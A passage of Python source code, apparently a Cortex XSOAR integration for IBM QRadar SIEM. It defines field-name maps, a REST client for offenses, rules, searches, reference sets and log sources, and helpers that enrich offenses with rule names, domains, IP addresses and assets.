'remote_destination_count': 'RemoteDestinationCount',
'start_time': 'StartTime',
'event_count': 'EventCount',
'flow_count': 'FlowCount',
'offense_source': 'OffenseSource',
'magnitude': 'Magnitude',
'last_updated_time': 'LastUpdatedTime',
'offense_type': 'OffenseType',
'protected': 'Protected',
'LinkToOffense': 'LinkToOffense',
'rules': 'Rules',
'domain_name': 'DomainName',
'assets': 'Assets'
}
CLOSING_REASONS_OLD_NEW_MAP = {
'id': 'ID',
'text': 'Name',
'is_reserved': 'IsReserved',
'is_deleted': 'IsDeleted'
}
NOTES_OLD_NEW_MAP = {
'id': 'ID',
'note_text': 'Text',
'create_time': 'CreateTime',
'username': 'CreatedBy'
}
RULES_OLD_NEW_MAP = {
'owner': 'Owner',
'base_host_id': 'BaseHostID',
'capacity_timestamp': 'CapacityTimestamp',
'origin': 'Origin',
'creation_date': 'CreationDate',
'type': 'Type',
'enabled': 'Enabled',
'modification_date': 'ModificationDate',
'name': 'Name',
'average_capacity': 'AverageCapacity',
'id': 'ID',
'base_capacity': 'BaseCapacity'
}
RULES_GROUP_OLD_NEW_MAP = {
'owner': 'Owner',
'modified_time': 'ModifiedTime',
'level': 'Level',
'name': 'Name',
'description': 'Description',
'id': 'ID',
'child_groups': 'ChildGroups',
'child_items': 'ChildItems',
'type': 'Type',
'parent_id': 'ParentID'
}
ASSET_OLD_NEW_MAP = {
'vulnerability_count': 'VulnerabilityCount',
'interfaces': 'Interfaces',
'risk_score_sum': 'RiskScoreSum',
'hostnames': 'Hostnames',
'id': 'ID',
'users': 'Users',
'domain_id': 'DomainID',
'properties': 'Properties',
'products': 'Products'
}
SEARCH_OLD_NEW_MAP = {'search_id': 'ID', 'status': 'Status'}
REFERENCE_SETS_OLD_NEW_MAP = {
'number_of_elements': 'NumberOfElements',
'name': 'Name',
'creation_time': 'CreationTime',
'element_type': 'ElementType',
'time_to_live': 'TimeToLive',
'timeout_type': 'TimeoutType',
'data': 'Data',
}
REFERENCE_SET_DATA_OLD_NEW_MAP = {
'last_seen': 'LastSeen',
'source': 'Source',
'value': 'Value',
'first_seen': 'FirstSeen'
}
DOMAIN_OLD_NEW_MAP = {
'asset_scanner_ids': 'AssetScannerIDs',
'custom_properties': 'CustomProperties',
'deleted': 'Deleted',
'description': 'Description',
'event_collector_ids': 'EventCollectorIDs',
'flow_collector_ids': 'FlowCollectorIDs',
'flow_source_ids': 'FlowSourceIDs',
'id': 'ID',
'log_source_ids': 'LogSourceIDs',
'log_source_group_ids': 'LogSourceGroupIDs',
'name': 'Name',
'qvm_scanner_ids': 'QVMScannerIDs',
'tenant_id': 'TenantID'
}
SAVED_SEARCH_OLD_NEW_MAP = {
'owner': 'Owner',
'description': 'Description',
'creation_date': 'CreationDate',
'uid': 'UID',
'database': 'Database',
'is_quick_search': 'QuickSearch',
'name': 'Name',
'modified_date': 'ModifiedDate',
'id': 'ID',
'aql': 'AQL',
'is_shared': 'IsShared'
}
IP_GEOLOCATION_OLD_NEW_MAP = {
'continent': 'Continent',
'traits': 'Traits',
'geo_json': 'Geolocation',
'city': 'City',
'ip_address': 'IPAddress',
'represented_country': 'RepresentedCountry',
'registered_country': 'RegisteredCountry',
'is_local': 'IsLocalCountry',
'location': 'Location',
'postal': 'Postal',
'physical_country': 'PhysicalCountry',
'subdivisions': 'SubDivisions'
}
LOG_SOURCES_OLD_NEW_MAP = {
'sending_ip': 'SendingIP',
'internal': 'Internal',
'protocol_parameters': 'ProtocolParameters',
'description': 'Description',
'enabled': 'Enabled',
'group_ids': 'GroupIDs',
'credibility': 'Credibility',
'id': 'ID',
'protocol_type_id': 'ProtocolTypeID',
'creation_date': 'CreationDate',
'name': 'Name',
'modified_date': 'ModifiedDate',
'auto_discovered': 'AutoDiscovered',
'type_id': 'TypeID',
'last_event_time': 'LastEventTime',
'gateway': 'Gateway',
'status': 'Status'
}
USECS_ENTRIES = {'last_persisted_time',
'start_time',
'close_time',
'create_time',
'creation_time',
'creation_date',
'last_updated_time',
'first_persisted_time',
'modification_date',
'last_seen',
'first_seen',
'starttime',
'devicetime',
'last_reported',
'created',
'last_seen_profiler',
'last_seen_scanner',
'first_seen_scanner',
'first_seen_profiler',
'modified_time',
'last_event_time',
'modified_date',
'first_event_flow_seen',
'last_event_flow_seen'}
LOCAL_DESTINATION_IPS_OLD_NEW_MAP = {
'domain_id': 'DomainID',
'event_flow_count': 'EventFlowCount',
'first_event_flow_seen': 'FirstEventFlowSeen',
'id': 'ID',
'last_event_flow_seen': 'LastEventFlowSeen',
'local_destination_ip': 'LocalDestinationIP',
'magnitude': 'Magnitude',
'network': 'Network',
'offense_ids': 'OffenseIDs',
'source_address_ids': 'SourceAddressIDs'
}
SOURCE_IPS_OLD_NEW_MAP = {
'domain_id': 'DomainID',
'event_flow_count': 'EventFlowCount',
'first_event_flow_seen': 'FirstEventFlowSeen',
'id': 'ID',
'last_event_flow_seen': 'LastEventFlowSeen',
'local_destination_address_ids': 'LocalDestinationAddressIDs',
'magnitude': 'Magnitude',
'network': 'Network',
'offense_ids': 'OffenseIDs',
'source_ip': 'SourceIP'
}
''' ENRICHMENT MAPS '''
ASSET_PROPERTIES_NAME_MAP = {
'Unified Name': 'Name',
'CVSS Collateral Damage Potential': 'AggregatedCVSSScore',
'Weight': 'Weight'
}
FULL_ASSET_PROPERTIES_NAMES_MAP = {
'Compliance Notes': 'ComplianceNotes',
'Compliance Plan': 'CompliancePlan',
'Location': 'Location',
'Switch ID': 'SwitchID',
'Switch Port ID': 'SwitchPort',
'Group Name': 'GroupName',
'Vulnerabilities': 'Vulnerabilities',
}
LONG_RUNNING_REQUIRED_PARAMS = {'fetch_mode': 'Fetch mode',
'offenses_per_fetch': 'Number of offenses to pull per API call (max 50)',
'events_limit': 'Maximum number of events per incident.'}
''' ENUMS '''
class FetchMode(Enum):
"""
Enums for the options of fetching the incidents.
"""
no_events = 'Fetch Without Events'
all_events = 'Fetch With All Events'
correlations_events_only = 'Fetch Correlation Events Only'
''' CLIENT CLASS '''
class Client(BaseClient):
def __init__(self, server: str, verify: bool, proxy: bool, api_version: str, credentials: Dict):
username = credentials.get('identifier')
password = credentials.get('password')
if username == API_USERNAME:
self.base_headers = {'Version': api_version, 'SEC': password}
auth = None
else:
auth = (username, password)
self.base_headers = {'Version': api_version}
base_url = urljoin(server, '/api')
super().__init__(base_url=base_url, verify=verify, proxy=proxy, auth=auth)
self.password = password
self.server = server
def http_request(self, method: str, url_suffix: str, params: Optional[Dict] = None,
json_data: Optional[Dict] = None, additional_headers: Optional[Dict] = None,
timeout: Optional[int] = None):
headers = {**additional_headers, **self.base_headers} if additional_headers else self.base_headers
return self._http_request(
method=method,
url_suffix=url_suffix,
params=params,
json_data=json_data,
headers=headers,
error_handler=self.qradar_error_handler,
timeout=timeout
)
@staticmethod
def qradar_error_handler(res: requests.Response):
"""
QRadar error handler for any error occurred during the API request.
This function job is to translate the known exceptions returned by QRadar
to human readable exception to help the user understand why the request have failed.
If error returned is not in the expected error format, raises the exception as is.
Args:
res (Any): The error response returned by QRadar.
Returns:
- raises DemistoException.
"""
err_msg = f'Error in API call [{res.status_code}] - {res.reason}'
try:
# Try to parse json error response
error_entry = res.json()
message = error_entry.get('message', '')
if 'items=x-y' in message:
message = 'Failed to parse Range argument. The syntax of the Range argument must follow this pattern:' \
' x-y'
elif 'unauthorized to access' in err_msg or 'No SEC header present in request' in err_msg:
message = 'Authorization Error: make sure credentials are correct.'
elif 'The specified encryption strength is not available' in err_msg:
err_msg = ''
message = 'The specified encryption is not available, try using a weaker encryption (AES128).'
elif 'User has insufficient capabilities to access this endpoint resource' in message:
message = 'The given credentials do not have the needed permissions to perform the call the endpoint' \
f'\n{res.request.path_url}.\n' \
'Please supply credentials with the needed permissions as can be seen in the integration ' \
'description, or do not call or enrich offenses with the mentioned endpoint.'
err_msg += f'\n{message}'
raise DemistoException(err_msg, res=res)
except ValueError:
err_msg += '\n{}'.format(res.text)
raise DemistoException(err_msg, res=res)
def offenses_list(self, range_: Optional[str] = None, offense_id: Optional[int] = None,
filter_: Optional[str] = None, fields: Optional[str] = None, sort: Optional[str] = None):
id_suffix = f'/{offense_id}' if offense_id else ''
params = assign_params(fields=fields) if offense_id else assign_params(filter=filter_, fields=fields, sort=sort)
additional_headers = {'Range': range_} if not offense_id else None
return self.http_request(
method='GET',
url_suffix=f'/siem/offenses{id_suffix}',
params=params,
additional_headers=additional_headers
)
def offense_update(self, offense_id: int, protected: Optional[str] = None, follow_up: Optional[str] = None,
status: Optional[str] = None, closing_reason_id: Optional[int] = None,
assigned_to: Optional[str] = None, fields: Optional[str] = None):
return self.http_request(
method='POST',
url_suffix=f'/siem/offenses/{offense_id}',
params=assign_params(
protected=protected,
follow_up=follow_up,
status=status,
closing_reason_id=closing_reason_id,
assigned_to=assigned_to,
fields=fields
)
)
def closing_reasons_list(self, closing_reason_id: Optional[int] = None, include_reserved: Optional[bool] = None,
include_deleted: Optional[bool] = None, range_: Optional[str] = None,
filter_: Optional[str] = None, fields: Optional[str] = None):
id_suffix = f'/{closing_reason_id}' if closing_reason_id else ''
params = assign_params(fields=fields) if closing_reason_id else assign_params(include_reserved=include_reserved,
include_deleted=include_deleted,
filter=filter_, fields=fields)
additional_headers = {'Range': range_} if not closing_reason_id and range_ else None
return self.http_request(
method='GET',
url_suffix=f'/siem/offense_closing_reasons{id_suffix}',
additional_headers=additional_headers,
params=params
)
def offense_notes_list(self, offense_id: int, range_: str, note_id: Optional[int] = None,
filter_: Optional[str] = None, fields: Optional[str] = None):
note_id_suffix = f'/{note_id}' if note_id else ''
params = assign_params(fields=fields) if note_id else assign_params(filter=filter_, fields=fields)
additional_headers = {'Range': range_} if not note_id else None
return self.http_request(
method='GET',
url_suffix=f'/siem/offenses/{offense_id}/notes{note_id_suffix}',
additional_headers=additional_headers,
params=params
)
def offense_notes_create(self, offense_id: int, note_text: str, fields: Optional[str] = None):
return self.http_request(
method='POST',
url_suffix=f'/siem/offenses/{offense_id}/notes',
params=assign_params(note_text=note_text, fields=fields)
)
def rules_list(self, rule_id: Optional[str] = None, range_: Optional[str] = None, filter_: Optional[str] = None,
fields: Optional[str] = None):
id_suffix = f'/{rule_id}' if rule_id else ''
params = assign_params(fields=fields) if rule_id else assign_params(filter=filter_, fields=fields)
additional_headers = {'Range': range_} if range_ and not rule_id else None
return self.http_request(
method='GET',
url_suffix=f'/analytics/rules{id_suffix}',
params=params,
additional_headers=additional_headers
)
def rule_groups_list(self, range_: str, rule_group_id: Optional[int] = None, filter_: Optional[str] = None,
fields: Optional[str] = None):
id_suffix = f'/{rule_group_id}' if rule_group_id else ''
additional_headers = {'Range': range_} if not rule_group_id else None
params = assign_params(fields=fields) if rule_group_id else assign_params(filter=filter_, fields=fields)
return self.http_request(
method='GET',
url_suffix=f'/analytics/rule_groups{id_suffix}',
additional_headers=additional_headers,
params=params
)
def assets_list(self, range_: Optional[str] = None, filter_: Optional[str] = None, fields: Optional[str] = None):
return self.http_request(
method='GET',
url_suffix='/asset_model/assets',
additional_headers={'Range': range_},
params=assign_params(filter=filter_, fields=fields)
)
def saved_searches_list(self, range_: str, timeout: Optional[int], saved_search_id: Optional[str] = None,
filter_: Optional[str] = None, fields: Optional[str] = None):
id_suffix = f'/{saved_search_id}' if saved_search_id else ''
params = assign_params(fields=fields) if saved_search_id else assign_params(filter=filter_, fields=fields)
additional_headers = {'Range': range_} if not saved_search_id else None
return self.http_request(
method='GET',
url_suffix=f'/ariel/saved_searches{id_suffix}',
additional_headers=additional_headers,
params=params,
timeout=timeout
)
def searches_list(self, range_: str, filter_: Optional[str] = None):
return self.http_request(
method='GET',
url_suffix='/ariel/searches',
additional_headers={'Range': range_},
params=assign_params(filter=filter_)
)
def search_create(self, query_expression: Optional[str] = None, saved_search_id: Optional[str] = None):
return self.http_request(
method='POST',
url_suffix='/ariel/searches',
params=assign_params(
query_expression=query_expression,
saved_search_id=saved_search_id
)
)
def search_status_get(self, search_id: str):
return self.http_request(
method='GET',
url_suffix=f'/ariel/searches/{search_id}',
)
def search_results_get(self, search_id: str, range_: Optional[str] = None):
return self.http_request(
method='GET',
url_suffix=f'/ariel/searches/{search_id}/results',
additional_headers={'Range': range_} if range_ else None
)
def reference_sets_list(self, range_: Optional[str] = None, ref_name: Optional[str] = None,
filter_: Optional[str] = None, fields: Optional[str] = None):
name_suffix = f'/{parse.quote(ref_name, safe="")}' if ref_name else ''
params = assign_params(fields=fields) if ref_name else assign_params(filter=filter_, fields=fields)
additional_headers = {'Range': range_} if not ref_name else None
return self.http_request(
method='GET',
url_suffix=f'/reference_data/sets{name_suffix}',
params=params,
additional_headers=additional_headers
)
def reference_set_create(self, ref_name: str, element_type: str, timeout_type: Optional[str] = None,
time_to_live: Optional[str] = None, fields: Optional[str] = None):
return self.http_request(
method='POST',
url_suffix='/reference_data/sets',
params=assign_params(
name=ref_name,
element_type=element_type,
timeout_type=timeout_type,
time_to_live=time_to_live,
fields=fields
)
)
def reference_set_delete(self, ref_name: str, purge_only: Optional[str] = None, fields: Optional[str] = None):
return self.http_request(
method='DELETE',
url_suffix=f'/reference_data/sets/{parse.quote(ref_name, safe="")}',
params=assign_params(purge_only=purge_only, fields=fields)
)
def reference_set_value_upsert(self, ref_name: str, value: str, source: Optional[str] = None,
fields: Optional[str] = None):
return self.http_request(
method='POST',
url_suffix=f'/reference_data/sets/{parse.quote(ref_name, safe="")}',
params=assign_params(value=value, source=source, fields=fields)
)
def reference_set_value_delete(self, ref_name: str, value: str):
return self.http_request(
method='DELETE',
url_suffix=f'/reference_data/sets/{parse.quote(ref_name, safe="")}/{value}'
)
def domains_list(self, domain_id: Optional[int] = None, range_: Optional[str] = None, filter_: Optional[str] = None,
fields: Optional[str] = None):
id_suffix = f'/{domain_id}' if domain_id else ''
params = assign_params(fields=fields) if domain_id else assign_params(filter=filter_, fields=fields)
additional_headers = {'Range': range_} if not domain_id and range_ else None
return self.http_request(
method='GET',
url_suffix=f'/config/domain_management/domains{id_suffix}',
additional_headers=additional_headers,
params=params
)
def indicators_upload(self, ref_name: str, indicators: Any, fields: Optional[str] = None):
headers = {
'Content-Type': 'application/json'
}
if fields:
headers['fields'] = fields
return self.http_request(
method='POST',
url_suffix=f'/reference_data/sets/bulk_load/{parse.quote(ref_name, safe="")}',
json_data=indicators,
additional_headers=headers
)
def geolocations_for_ip(self, filter_: Optional[str] = None, fields: Optional[str] = None):
return self.http_request(
method='GET',
url_suffix='/services/geolocations',
params=assign_params(filter=filter_, fields=fields)
)
def log_sources_list(self, qrd_encryption_algorithm: str, qrd_encryption_password: str,
range_: str, filter_: Optional[str] = None, fields: Optional[str] = None):
return self.http_request(
method='GET',
url_suffix='/config/event_sources/log_source_management/log_sources',
params=assign_params(filter=filter_, fields=fields),
additional_headers={
'x-qrd-encryption-algorithm': qrd_encryption_algorithm,
'x-qrd-encryption-password': qrd_encryption_password,
'Range': range_
}
)
def custom_properties(self, range_: Optional[str] = None, filter_: Optional[str] = None,
fields: Optional[str] = None):
return self.http_request(
method='GET',
url_suffix='/config/event_sources/custom_properties/regex_properties',
params=assign_params(filter=filter_, fields=fields),
additional_headers={'Range': range_} if range_ else None
)
def offense_types(self, filter_: Optional[str] = None, fields: Optional[str] = None):
return self.http_request(
method='GET',
url_suffix='/siem/offense_types',
params=assign_params(filter=filter_, fields=fields)
)
def get_addresses(self, address_suffix: str, filter_: Optional[str] = None, fields: Optional[str] = None,
range_: Optional[str] = None):
return self.http_request(
method='GET',
url_suffix=f'/siem/{address_suffix}',
params=assign_params(filter=filter_, fields=fields),
additional_headers={'Range': range_} if range_ else None
)
def test_connection(self):
"""
Test connection with databases (should always be up)
"""
self.http_request(method='GET', url_suffix='/ariel/databases')
return 'ok'
''' HELPER FUNCTIONS '''
def safely_update_context_data(func: Callable):
"""Decorator for updating context data using versions.
In case of a race condition, preform func with the new context_data and try updating again.
Args:
func: The function to preform with the new context data before updating.
raise ValueError if context_data or version are not in the kwargs for the function.
raise DemistoException if reached maximum of retries.
"""
def wrapper(*args, **kwargs):
context_was_set = False
retries = 0
max_retries = 5
return_value = None
while not context_was_set and retries < max_retries:
context_data, version, return_value = func(*args, **kwargs)
print_debug_msg(f'Attempting to update context data after version {version} with retry {retries}')
new_context_data, new_version = get_integration_context_with_version()
if new_version == version:
try:
set_to_integration_context_with_retries(context_data, max_retry_times=1)
context_was_set = True
print_debug_msg(f'Updated integration context after version {version} in retry {retries}.')
except Exception as e:
if 'Max retry attempts exceeded' in str(e):
continue
else:
raise e
else:
if 'context_data' not in kwargs or 'version' not in kwargs:
raise ValueError('context_data and version must be in the func kwargs if '
'safely_update_context_data decorator is used but were not found.')
else:
kwargs['context_data'] = extract_context_data(new_context_data)
kwargs['version'] = new_version
print_debug_msg(f'Could not update context data after version {version} due to new '
f'version {new_version} in retry {retries}')
retries = retries + 1
if retries == max_retries:
raise DemistoException(f'Reached maximum retries, could not update context data for function {func}.')
return return_value
return wrapper
def add_iso_entries_to_dict(dicts: List[Dict]) -> List[Dict]:
"""
Takes list of dicts, for each dict:
creates a new dict, and for each field in the output that
is contained in 'USECS_ENTRIES', maps its value to be iso format corresponding to the value of the field.
Args:
dicts (List[Dict]): List of the dicts to be transformed.
Returns:
(List[Dict]): New dicts with iso entries for the corresponding items in 'USECS_ENTRIES'
"""
return [{k: (get_time_parameter(v, iso_format=True) if k in USECS_ENTRIES else v)
for k, v in dict_.items()} for dict_ in dicts]
def sanitize_outputs(outputs: Any, key_replace_dict: Optional[Dict] = None) -> List[Dict]:
"""
Gets a list of all the outputs, and sanitizes outputs.
- Removes empty elements.
- adds ISO entries to the outputs.
- Outputs only keys found in 'key_replace_dict', saving their names by 'key_replace_dict values,
if 'key_replace_dict' is not None.
Args:
outputs (List[Dict]): List of the outputs to be sanitized.
key_replace_dict (Dict): Dict of the keys to transform their names.
Returns:
(List[Dict]): Sanitized outputs.
"""
if not isinstance(outputs, list):
outputs = [outputs]
outputs = [remove_empty_elements(output) for output in outputs]
outputs = add_iso_entries_to_dict(outputs)
return build_final_outputs(outputs, key_replace_dict) if key_replace_dict else outputs
def get_time_parameter(arg: Union[Optional[str], Optional[int]], iso_format: bool = False, epoch_format: bool = False):
"""
parses arg into date time object with aware time zone if 'arg' exists.
If no time zone is given, sets timezone to UTC.
Returns the date time object created/ISO format/epoch format.
Args:
arg (str): The argument to turn into aware date time.
iso_format (bool): Whether to return date or the parsed format of the date.
epoch_format (bool): Whether to return date or the epoch format of the date.
Returns:
- (None) If 'arg' is None, returns None.
- (datetime): If 'arg' is exists and 'iso_format' and 'epoch_format' are false, returns date time.
- (str): If 'arg' is exists and parse_format is true, returns ISO format of the date time object.
- (int): If 'arg' is exists and epoch_format is true, returns epoch format of the date time object.
"""
maybe_unaware_date = arg_to_datetime(arg, is_utc=True)
if not maybe_unaware_date:
return None
aware_time_date = maybe_unaware_date if maybe_unaware_date.tzinfo else UTC_TIMEZONE.localize(
maybe_unaware_date)
if iso_format:
return aware_time_date.isoformat()
if epoch_format:
return int(aware_time_date.timestamp() * 1000)
return aware_time_date
def build_final_outputs(outputs: List[Dict], old_new_dict: Dict) -> List[Dict]:
"""
Receives outputs, or a single output, and a dict containing mapping of old key names to new key names.
Returns a list of outputs containing the new names contained in old_new_dict.
Args:
outputs (Dict): Outputs to replace its keys.
old_new_dict (Dict): Old key name mapped to new key name.
Returns:
(Dict): The dictionary with the transformed keys and their values.
"""
return [{old_new_dict.get(k): v for k, v in output.items() if k in old_new_dict} for output in outputs]
def build_headers(first_headers: List[str], all_headers: Set[str]) -> List[str]:
"""
Receives headers to be shown first in entry room, and concat all the headers after first headers.
Args:
first_headers (Set[str]): First headers to be shown in the entry room.
all_headers (Set[str]): List of all of the headers.
Returns:
(List[str]): List of all of the headers, where first_headers are first in the list.
"""
return first_headers + list(set.difference(all_headers, first_headers))
def is_valid_ip(ip: str) -> bool:
try:
ip_address(ip)
return True
except ValueError:
print_debug_msg(f'IP {ip} was found invalid.')
return False
def get_offense_types(client: Client, offenses: List[Dict]) -> Dict:
"""
Receives list of offenses, and performs API call to QRadar service to retrieve the offense type names
matching the offense type IDs of the offenses.
Args:
client (Client): Client to perform the API request to QRadar.
offenses (List[Dict]): List of all of the offenses.
Returns:
(Dict): Dictionary of {offense_type_id: offense_type_name}
"""
try:
offense_types_ids = {offense.get('offense_type') for offense in offenses if offense.get('offense_type') is not None}
if not offense_types_ids:
return dict()
offense_types = client.offense_types(filter_=f'''id in ({','.join(map(str, offense_types_ids))})''',
fields='id,name')
return {offense_type.get('id'): offense_type.get('name') for offense_type in offense_types}
except Exception as e:
demisto.error(f"Encountered an issue while getting offense type: {e}")
return {}
def get_offense_closing_reasons(client: Client, offenses: List[Dict]) -> Dict:
"""
Receives list of offenses, and performs API call to QRadar service to retrieve the closing reason names
matching the closing reason IDs of the offenses.
Args:
client (Client): Client to perform the API request to QRadar.
offenses (List[Dict]): List of all of the offenses.
Returns:
(Dict): Dictionary of {closing_reason_id: closing_reason_name}
"""
try:
closing_reason_ids = {offense.get('closing_reason_id') for offense in offenses
if offense.get('closing_reason_id') is not None}
if not closing_reason_ids:
return dict()
closing_reasons = client.closing_reasons_list(filter_=f'''id in ({','.join(map(str, closing_reason_ids))})''',
fields='id,text')
return {closing_reason.get('id'): closing_reason.get('text') for closing_reason in closing_reasons}
except Exception as e:
demisto.error(f"Encountered an issue while getting offense closing reasons: {e}")
return {}
def get_domain_names(client: Client, outputs: List[Dict]) -> Dict:
"""
Receives list of outputs, and performs API call to QRadar service to retrieve the domain names
matching the domain IDs of the outputs.
Args:
client (Client): Client to perform the API request to QRadar.
outputs (List[Dict]): List of all of the offenses.
Returns:
(Dict): Dictionary of {domain_id: domain_name}
"""
try:
domain_ids = {offense.get('domain_id') for offense in outputs if offense.get('domain_id') is not None}
if not domain_ids:
return dict()
domains_info = client.domains_list(filter_=f'''id in ({','.join(map(str, domain_ids))})''', fields='id,name')
return {domain_info.get('id'): domain_info.get('name') for domain_info in domains_info}
except Exception as e:
demisto.error(f"Encountered an issue while getting offense domain names: {e}")
return {}
def get_rules_names(client: Client, offenses: List[Dict]) -> Dict:
"""
Receives list of offenses, and performs API call to QRadar service to retrieve the rules names
matching the rule IDs of the offenses.
Args:
client (Client): Client to perform the API request to QRadar.
offenses (List[Dict]): List of all of the offenses.
Returns:
(Dict): Dictionary of {rule_id: rule_name}
"""
try:
rules_ids = {rule.get('id') for offense in offenses for rule in offense.get('rules', [])}
if not rules_ids:
return dict()
rules = client.rules_list(None, None, f'''id in ({','.join(map(str, rules_ids))})''', 'id,name')
return {rule.get('id'): rule.get('name') for rule in rules}
except Exception as e:
demisto.error(f"Encountered an issue while getting offenses rules: {e}")
return {}
def get_offense_addresses(client: Client, offenses: List[Dict], is_destination_addresses: bool) -> Dict:
"""
Receives list of offenses, and performs API call to QRadar service to retrieve the source IP values
matching the source IPs IDs of the offenses.
Args:
client (Client): Client to perform the API request to QRadar.
offenses (List[Dict]): List of all of the offenses.
is_destination_addresses(bool): Whether addresses to enrich are destination IPs (or source).
Returns:
(Dict): Dictionary of {source_address_id: source_address_name}.
"""
address_type = 'local_destination' if is_destination_addresses else 'source'
address_field = f'{address_type}_ip'
address_list_field = f'{address_type}_address_ids'
url_suffix = f'{address_type}_addresses'
def get_addresses_for_batch(b: List):
try:
return client.get_addresses(url_suffix, f'''id in ({','.join(map(str, b))})''', f'id,{address_field}')
except Exception as e:
demisto.error(f'Failed getting address barch with error: {e}')
return []
addresses_ids = [address_id for offense in offenses
for address_id in offense.get(address_list_field, [])]
# Submit addresses in batches to avoid overloading QRadar service
addresses_batches = [get_addresses_for_batch(b) for b
in batch(addresses_ids[:OFF_ENRCH_LIMIT], batch_size=int(BATCH_SIZE))]
return {address_data.get('id'): address_data.get(address_field)
for addresses_batch in addresses_batches
for address_data in addresses_batch}
def create_single_asset_for_offense_enrichment(asset: Dict) -> Dict:
"""
Recieves one asset, and returns the expected asset values for enriching offense.
Args:
asset (Dict): Asset to enrich the offense with
Returns:
(Dict): The enriched asset.
"""
interfaces = {'interfaces': [{
'mac_address': interface.get('mac_address'),
'id': interface.get('id'),
'ip_addresses': [{
'type': ip_add.get('type'),
'value': ip_add.get('value')
} for ip_add in interface.get('ip_addresses', [])]
} for interface in asset.get('interfaces', [])]}
properties = {prop.get('name'): prop.get('value') for prop in asset.get('properties', [])
if 'name' in prop and 'value' in prop}
offense_without_properties = {k: v for k, v in asset.items() if k != 'properties'}
return add_iso_entries_to_asset(dict(offense_without_properties, **properties, **interfaces))
def enrich_offense_with_assets(client: Client, offense_ips: List[str]) -> List[Dict]:
"""
Receives list of offense's IPs, and performs API call to QRadar service to retrieve assets correlated to IPs given.
Args:
client (Client): Client to perform the API request to QRadar.
offense_ips (List[str]): List of all of the offense's IPs.
Returns:
(List[Dict]): List of all the correlated assets.
"""
def get_assets_for_ips_batch(b: List):
filter_query = ' or '.join([f'interfaces contains ip_addresses contains value="{ip}"' for ip in b])
try:
return client.assets_list(filter_=filter_query)
except Exception as e:
demisto.error(f'Failed getting assets for filter_query: {filter_query}. {e}')
return []
offense_ips = [offense_ip for offense_ip in offense_ips if is_valid_ip(offense_ip)]
# Submit addresses in batches to avoid overloading QRadar service
assets = [asset for b in batch(offense_ips[:OFF_ENRCH_LIMIT], batch_size=int(BATCH_SIZE))
for asset in get_assets_for_ips_batch(b)]
return [create_single_asset_for_offense_enrichment(asset) for asset in assets]
def enrich_offenses_result(client: Client, offenses: Any, enrich_ip_addresses: bool,
enrich_assets: bool) -> List[Dict]:
"""
Receives list of offenses, and enriches the offenses with the following:
- Changes offense_type value from the offense type ID to the offense type name.
- Changes closing_reason_id value from closing reason ID to the closing reason name.
- Adds a link to the URL of each offense.
- Adds the domain name of the domain ID for each offense.
- Adds to each rule of the offense its name.
- Adds enrichment to each source/destination IP ID to its address (if enrich_ip_addresses is true).
- Adds enrichment of assets to each offense (if enrich_assets is true).
Args:
client (Client): Client to perform the API calls.
offenses (Any): List of all of the offenses to enrich.
enrich_ip_addresses (bool): Whether to enrich the offense source/destination IP addresses.
enrich_assets (bool): Whether to enrich the offense with assets.
Returns:
(List[Dict]): The enriched offenses.
"""
if not isinstance(offenses, list):
offenses = [offenses]
print_debug_msg('Enriching offenses')
offense_types_id_name_dict = get_offense_types(client, offenses)
closing_reasons_id_name_dict = get_offense_closing_reasons(client, offenses)
domain_id_name_dict = get_domain_names(client, offenses) if DOMAIN_ENRCH_FLG.lower() == 'true' else dict()
rules_id_name_dict = get_rules_names(client, offenses) if RULES_ENRCH_FLG.lower() == 'true' else dict()
source_addresses_id_ip_dict = get_offense_addresses(client, offenses, False) if enrich_ip_addresses else dict()
destination_addresses_id_ip_dict = get_offense_addresses(client, offenses, True) if enrich_ip_addresses else dict()
def create_enriched_offense(offense: Dict) -> Dict:
link_to_offense_suffix = '/console/do/sem/offensesummary?appName=Sem&pageId=OffenseSummary&summaryId' \
f'''={offense.get('id')}'''
offense_type = offense.get('offense_type')
closing_reason_id = offense.get('closing_reason_id')
domain_id = offense.get('domain_id')
basic_enriches = {
'offense_type': offense_types_id_name_dict.get(offense_type, offense_type),
'closing_reason_id': closing_reasons_id_name_dict.get(closing_reason_id, closing_reason_id),
'LinkToOffense': urljoin(client.server, link_to_offense_suffix),
}
domain_enrich = {
'domain_name': domain_id_name_dict.get(domain_id, domain_id)
} if DOMAIN_ENRCH_FLG.lower() == 'true' and domain_id_name_dict.get(domain_id, domain_id) else dict()
rules_enrich = {
'rules': [{
'id': rule.get('id'),
'type': rule.get('type'),
'name': rules_id_name_dict.get(rule.get('id'), rule.get('id'))
} for rule in offense.get('rules', [])] if RULES_ENRCH_FLG.lower() == 'true' else dict()
}
source_addresses_enrich = {
'source_address_ids': [source_addresses_id_ip_dict.get(source_address_id) for source_address_id in
offense.get('source_address_ids', [])]
} if enrich_ip_addresses else dict()
destination_addresses_enrich = {
'local_destination_address_ids': [destination_addresses_id_ip_dict.get(destination_address_id) for
destination_address_id in
offense.get('local_destination_address_ids', [])]
} if enrich_ip_addresses else dict()
if enrich_assets:
source_ips: List = source_addresses_enrich.get('source_address_ids', [])
destination_ips: List = destination_addresses_enrich.get('local_destination_address_ids', [])
all_ips: List = source_ips + destination_ips
asset_enrich = {'assets': enrich_offense_with_assets(client, all_ips)}
else:
asset_enrich = dict()
return dict(offense, **basic_enriches, **domain_enrich, **rules_enrich, **source_addresses_enrich,
**destination_addresses_enrich, **asset_enrich)
result = [create_enriched_offense(offense) for offense in offenses]
print_debug_msg('Enriched offenses successfully.')
return result
def enrich_asset_properties(properties: List, properties_to_enrich_dict: Dict) -> Dict:
"""
Receives list of properties of an asset, and properties to enrich, and returns a dict containing the enrichment
Args:
properties (List): List of properties of an asset.
properties_to_enrich_dict (Dict): Properties to be enriched.
Returns:
(List[Dict]) List of new assets with enrichment.
"""
return {
properties_to_enrich_dict.get(prop.get('name')): {
'Value': prop.get('value'),
'LastUser': prop.get('last_reported_by')
} for prop in properties if prop.get('name') in properties_to_enrich_dict
}
def add_iso_entries_to_asset(asset: Dict) -> Dict:
"""
Transforms epoch entries to ISO entries in an asset.
Requires a special treatment, because some of the usec entries are nested.
Args:
asset (Dict): Asset to transform its epoch entries to ISO.
Returns:
(Dict): Asset transformed.
"""
def get_asset_entry(k: str, v: Any):
if k == 'interfaces':
return [{
k: (get_time_parameter(v, iso_format=True) if k in USECS_ENTRIES
else add_iso_entries_to_dict(v) if k == 'ip_addresses' else v)
for k, v in interface.items()
} for interface in v]
elif k == 'properties':
return add_iso_entries_to_dict(v)
elif k in USECS_ENTRIES:
return get_time_parameter(v, iso_format=True)
else:
return v
return {k: get_asset_entry(k, v) for k, v in asset.items()}
